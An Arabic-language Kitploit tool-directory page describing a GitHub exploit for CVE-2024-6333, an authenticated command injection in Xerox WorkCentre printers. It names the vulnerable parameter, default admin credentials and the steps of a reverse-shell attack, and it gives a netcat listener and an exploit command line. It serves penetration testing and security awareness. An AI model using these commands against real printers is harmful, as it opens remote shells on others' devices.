Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6333 — ثغرة تنفيذ تعليمات برمجية عن بُعد تتطلب مصادقة في طابعات Xerox WorkCentre عبر ميزة سجل استكشاف أخطاء الشبكة وإصلاحها. | Kitploit
أدوات/GitHubGitHub/0xqrx/cve-2024-6333
أمان الأنظمة المدمجةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمان الأجهزة وإنترنت الأشياء
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

ثغرة تنفيذ تعليمات برمجية عن بُعد تتطلب مصادقة في طابعات Xerox WorkCentre عبر ميزة سجل استكشاف أخطاء الشبكة وإصلاحها.

عرض المستودع
25منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-6333 - تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في Xerox

ثغرة تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في طابعات Xerox WorkCentre عبر ميزة سجل استكشاف أخطاء الشبكة.

الوصف

وظيفة سجل استكشاف أخطاء الشبكة (/properties/security/network_troubleshooting_log.php) تفشل في تعقيم معلمة خادم الوجهة (security.nwtroubleshoot.destination.server)، مما يسمح لمسؤول مصادق بحقن أوامر نظام تشغيل تعسفية. عند بدء التقاط سجل الشبكة، يتم تنفيذ الحمولة المحقونة كأمر شل، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.

المنتجات المتأثرة

  • طابعة XEROX WorkCentre 6655 (مُختبرة على إصدار البرنامج الثابت 073.110.019.14200)
  • عدة موديلات أخرى من طابعات Xerox (انظر النشرة الاستشارية)

المراجع

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

المتطلبات

  • Python 3
  • بيانات اعتماد إدارية صالحة على الطابعة المستهدفة
  • وصول عبر الشبكة إلى الهدف

التثبيت

pip install -r requirements.txt

الاستخدام

شغّل مستمعًا على جهازك:

nc -lvnp 8443

شغّل الأداة:

python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

الوسائط

الوسيطمطلوبالافتراضيالوصف
--targetنعمرابط الهدف (مثل: https://192.0.2.1)
--lhostنعمعنوان IP للمستمع
--lportلا8443منفذ المستمع
--userلاadminاسم مستخدم الإدارة
--passwordلا1111كلمة مرور الإدارة
--proxyلارابط البروكسي (مثل: http://127.0.0.1:8080)

كيف يعمل

  1. مصادقة على واجهة الويب الخاصة بالطابعة باستخدام بيانات الاعتماد المقدمة
  2. إيقاف أي جلسات سجل استكشاف أخطاء الشبكة الموجودة
  3. حقن حمولة الصدفة العكسية في حقل خادم الوجهة
  4. تشغيل التقاط سجل الشبكة، مما ينفذ الحمولة
  5. الانتظار 30 ثانية، ثم إرسال أمر تنظيف/إيقاف

إخلاء المسؤولية

تم توفير هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة